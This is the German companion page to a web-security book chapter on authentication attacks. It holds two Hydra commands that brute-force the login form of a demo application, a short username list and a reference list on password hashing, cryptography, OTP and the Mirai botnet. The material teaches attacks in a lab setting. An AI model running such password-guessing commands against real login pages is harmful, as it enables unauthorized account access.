Kapitel 4 - Angriffe auf die Authentifizierung
4.16 - Die Demo-Anwendung
Der erste Aufruf von Hydra:
hydra -l test -P /usr/share/wordlists/wfuzz/others/common_pass.txt 172.16.177.129 http-post-form "/app/index.php?aktion=einloggen:benutzer=^USER^&passwort=^PASS^:S=Ausloggen" -vV -f
Die IP-Adresse 172.16.177.129 müssen Sie durch die IP-Adresse
des Servers mit der Demo-Anwendung ersetzen.
hydra -L /usr/share/wordlists/user.txt -p password 172.16.177.129 http-post-form "/app/index.php?aktion=einloggen:benutzer=^USER^&passwort=^PASS^:S=Ausloggen" -vV -f
Auch hier müssen Sie wieder die IP-Adresse anpassen, außerdem müssen Sie
vorher die Datei /usr/share/wordlists/user.txt mit der Liste
der Benutzernamen anlegen:
autor
gast
test
user
Die Links
- [Base64_Online] Base64 - Online Base64 decoder and encoder
- [bcrypt] Openwall: „bcrypt password hashing for your software and your servers“
- [BSI-TR-02102-1] Bundesamt für Sicherheit in der Informationstechnik: „BSI TR-02102 Kryptographische Verfahren: Empfehlungen und Schlüssellängen“
- [Connect] OpenID Connect
- [Eile_13] Carsten Eilers: „Websecurity - Logikfehler in der Authentifizierung“
- [Eile_16] Carsten Eilers:
- [Google-Authenticator] Google Authenticator
- [Klab_16] Octave Klaba, @olesovhcom auf Twitter, 20.9.2016: „we got 2 huge multi DDoS: 1156Gbps then 901Gbps“
- [Klab_16b] Octave Klaba, @olesovhcom auf Twitter:
- [Klin_08] Bernd Kling; Telepolis: „Sarah Palin: Webmail-Hacken für Anfänger“
- [Kreb_16] Brian Krebs; Krebs on Security, 21.9.2016: „KrebsOnSecurity Hit With Record DDoS“
- [Kreb_16b] Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet ‘Mirai’ Released“
- [Kreb_16c] Brian Krebs; Krebs on Security, 3.10.2016: „Who Makes the IoT Things Under Attack?“
- [Krypto-AES] Carsten Eilers: „Verfahren der Kryptographie, Teil 6: Der Advanced Encryption Standard (AES)“
- [Krypto-Betrieb] Carsten Eilers: „Verfahren der Kryptographie, Teil 5: Betriebsarten für Blockchiffren“
- [Krypto-Hash] Carsten Eilers: „Verfahren der Kryptographie, Teil 14: Hashfunktionen - Einführung“
- [Krypto-SHA-2] Carsten Eilers: „Verfahren der Kryptographie, Teil 16: SHA-2 ist noch für einige Jahre sicher“
- [Krypto-SHA-3] Carsten Eilers: „Verfahren der Kryptographie, Teil 17: SHA-3 steht als Alternative und Ersatz bereit“
- [Krypto-Sicher] Carsten Eilers, entwickler.de: „Kryptoverfahren: Welche sollte man verwenden bzw. meiden?“
- [Marl_09] Moxie Marlinspike; Black Hat DC 2009: „New Techniques for Defeating SSL/TLS“
(Paper)
- [Mirai_Code] jgamblin/Mirai-Source-Code auf GitHub
- [Mirai_Scanner] Mirai-Source-Code/scanner.c auf GitHub
- [Oech_03] Philippe Oechslin: „Making a Faster Cryptanalytic Time-Memory Trade-Off“
- [OAuth] OAuth 2.0
- [OpenID] OpenID
- [PrMa_99] Niels Provos, David Mazières; USENIX 99: „A Future-Adaptable Password Scheme“
- [RFC_1319] RFC 1319: The MD2 Message-Digest Algorithm
- [RFC_4226] RFC 4226 - HOTP: An HMAC-Based One-Time Password Algorithm
- [RFC_4648] RFC 4648 - The Base16, Base32, and Base64 Data Encodings
- [RFC_6149] RFC 6149: MD2 to Historic Status
- [RFC_6238] RFC 6238 - TOTP: Time-Based One-Time Password Algorithm
- [RFC_8018] RFC 8018: PKCS #5: Password-Based Cryptography Specification Version 2.1
- [RSA-Angriff] Carsten Eilers:
- [scrypt] The scrypt key derivation function
- [Wese_09] Daniel Wesemann; InfoSec Handlers Diary Blog: „Password rules: Change them every 25 years“
- [Wikh_16] Zach Wikholm; Flashpoint, 7.10.2016: „When Vulnerabilities Travel Downstream“
- [Wiki_ PBKDF2] PBKDF2 (Password-Based Key Derivation Function 2)
- [ZeBH_16] Igal Zeifman, Dima Bekerman, Ben Herzberg; Incapsula Blog: „Breaking Down Mirai: An IoT DDoS Botnet Analysis“
- [Zett_08] Kim Zetter; WIRED: „Palin E-Mail Hacker Says It Was Easy“
Zurück